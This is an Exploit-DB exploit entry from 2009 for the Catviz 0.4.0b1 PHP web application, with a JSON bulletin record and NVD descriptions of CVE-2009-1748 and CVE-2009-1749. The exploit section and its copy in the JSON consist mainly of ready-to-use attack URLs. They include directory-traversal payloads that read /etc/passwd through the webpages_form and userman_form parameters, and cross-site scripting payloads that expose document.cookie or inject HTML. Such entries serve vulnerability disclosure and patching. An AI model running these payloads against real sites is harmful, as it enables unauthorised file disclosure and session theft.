ID EDB-ID:8745
Type exploitdb
Reporter ByALBAYX
Modified 2009-05-20T00:00:00
Description
Catviz 0.4.0b1 (LFI/XSS) Multiple Remote Vulnerabilities. CVE-2009-1748, CVE-2009-1749. Webapps exploit for the PHP platform
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@===C4TEAM.ORG====ByALBAYX====C4TEAM.ORG====@
@~~=======================================~~@
@~~=Author : ByALBAYX @
@ @
@~~=Website : WWW.C4TEAM.ORG @
@ @
@@@@@@@@@@@@@@@@@@TURKISH@@@@@@@@@@@@@@@@@@@@
@
@ _.--"""""--._
@ .' '.
@ / \
@ ; C4TEAM ;
@ | |
@ | |
@ ; ;
@ \ (`'--, ,--'`) /
@ \ \ _ ) ( _ / /
@ ) )(')/ \(')( (
@ (_ `""` /\ `""` _)
@ \`"-, / \ ,-"`/
@ `\ / `""` \ /`
@ |/\/\/\/\/\|
@ |\ /|
@ ; |/\/\/\| ;
@ \`-`--`-`/
@ \ /
@ ',__,'
@
@ Catviz 0.4.0 Beta 1
@
@ Demo:
@
@ http://catviz.sourceforge.net
@
@
@ LFI (local file inclusion) :/
@
@ http://c4team.org/ [Path] /index.php?webpages_form=../../../../../../../../../../../../../etc/passwd%00
@
@ http://c4team.org/ [Path] /index.php?userman_form=../../../../../../../../../../../../../etc/passwd%00
@
@
@
@ XSS (cross-site scripting) :/
@
@
@ http://c4team.org/ [Path] /index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
@
@ http://c4team.org/ [Path] /index.php?webpages_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
@
@ http://c4team.org/ [Path] /index.php?userman_form="><script>alert(document.cookie)</script>
@
@ http://c4team.org/ [Path] /index.php?webpages_form="><script>alert(document.cookie)</script>
@
@ http://c4team.org/ [Path] /index.php?userman_form='><h1>ByALBAYX</h1><div style=display:none>
@
@ http://c4team.org/ [Path] /index.php?webpages_form='><h1>ByALBAYX</h1><div style=display:none>
@
@@@:/
# milw0rm.com [2009-05-20]
{"id": "EDB-ID:8745", "hash": "c3b94567f6d6d1e8a58db9cf9d59b90b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "catviz 0.4.0b1 - LFI/XSS Multiple Vulnerabilities", "description": "Catviz 0.4.0b1 (LFI/XSS) Multiple Remote Vulnerabilities. CVE-2009-1748,CVE-2009-1749. Webapps exploit for php platform", "published": "2009-05-20T00:00:00", "modified": "2009-05-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/8745/", "reporter": "ByALBAYX", "references": [], "cvelist": ["CVE-2009-1748", "CVE-2009-1749"], "lastseen": "2016-02-01T08:03:58", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-02-01T08:03:58"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1749", "CVE-2009-1748"]}], "modified": "2016-02-01T08:03:58"}, "vulnersScore": 6.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8745/", "sourceData": "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@===C4TEAM.ORG====ByALBAYX====C4TEAM.ORG====@\n@~~=======================================~~@\n@~~=Author : ByALBAYX @\n@ @\n@~~=Website : WWW.C4TEAM.ORG @\n@ @\n@@@@@@@@@@@@@@@@@@TURKISH@@@@@@@@@@@@@@@@@@@@\n@\n@ _.--\"\"\"\"\"--._\n@ .' 
'.\n@ / \\\n@ ; C4TEAM ;\n@ | |\n@ | |\n@ ; ;\n@ \\ (`'--, ,--'`) /\n@ \\ \\ _ ) ( _ / /\n@ ) )(')/ \\(')( (\n@ (_ `\"\"` /\\ `\"\"` _)\n@ \\`\"-, / \\ ,-\"`/\n@ `\\ / `\"\"` \\ /`\n@ |/\\/\\/\\/\\/\\|\n@ |\\ /|\n@ ; |/\\/\\/\\| ;\n@ \\`-`--`-`/\n@ \\ /\n@ ',__,'\n@ \n@ Catviz 0.4.0 Beta 1\n@ \n@ Demo:\n@\n@ http://catviz.sourceforge.net\n@\n@\n@ LFI :/\n@\n@ http://c4team.org/ [Path] /index.php?webpages_form=../../../../../../../../../../../../../etc/passwd%00\n@\n@ http://c4team.org/ [Path] /index.php?userman_form=../../../../../../../../../../../../../etc/passwd%00\n@\n@\n@\n@ XSS :/\n@\n@\n@ http://c4team.org/ [Path] /index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>\n@\n@ http://c4team.org/ [Path] /index.php?webpages_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>\n@\n@ http://c4team.org/ [Path] /index.php?userman_form=\"><script>alert(document.cookie)</script>\n@\n@ http://c4team.org/ [Path] /index.php?webpages_form=\"><script>alert(document.cookie)</script>\n@\n@ http://c4team.org/ [Path] /index.php?userman_form='><h1>ByALBAYX</h1><div style=display:none>\n@\n@ http://c4team.org/ [Path] /index.php?webpages_form='><h1>ByALBAYX</h1><div style=display:none>\n@\n@@@:/\n\n# milw0rm.com [2009-05-20]\n", "osvdbidlist": ["54656", "54657"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:58", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in index.php in Catviz 0.4.0 beta 1 allow remote attackers to inject arbitrary web script or HTML via the (1) userman_form and (2) webpages_form parameters.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-1749", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1749", "published": "2009-05-22T11:52:00", "title": "CVE-2009-1749", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:09:58", "bulletinFamily": "NVD", "description": "Multiple directory traversal vulnerabilities in index.php in Catviz 0.4.0 Beta 1 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) webpages_form or (2) userman_form parameter.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-1748", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1748", "published": "2009-05-22T11:52:00", "title": "CVE-2009-1748", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}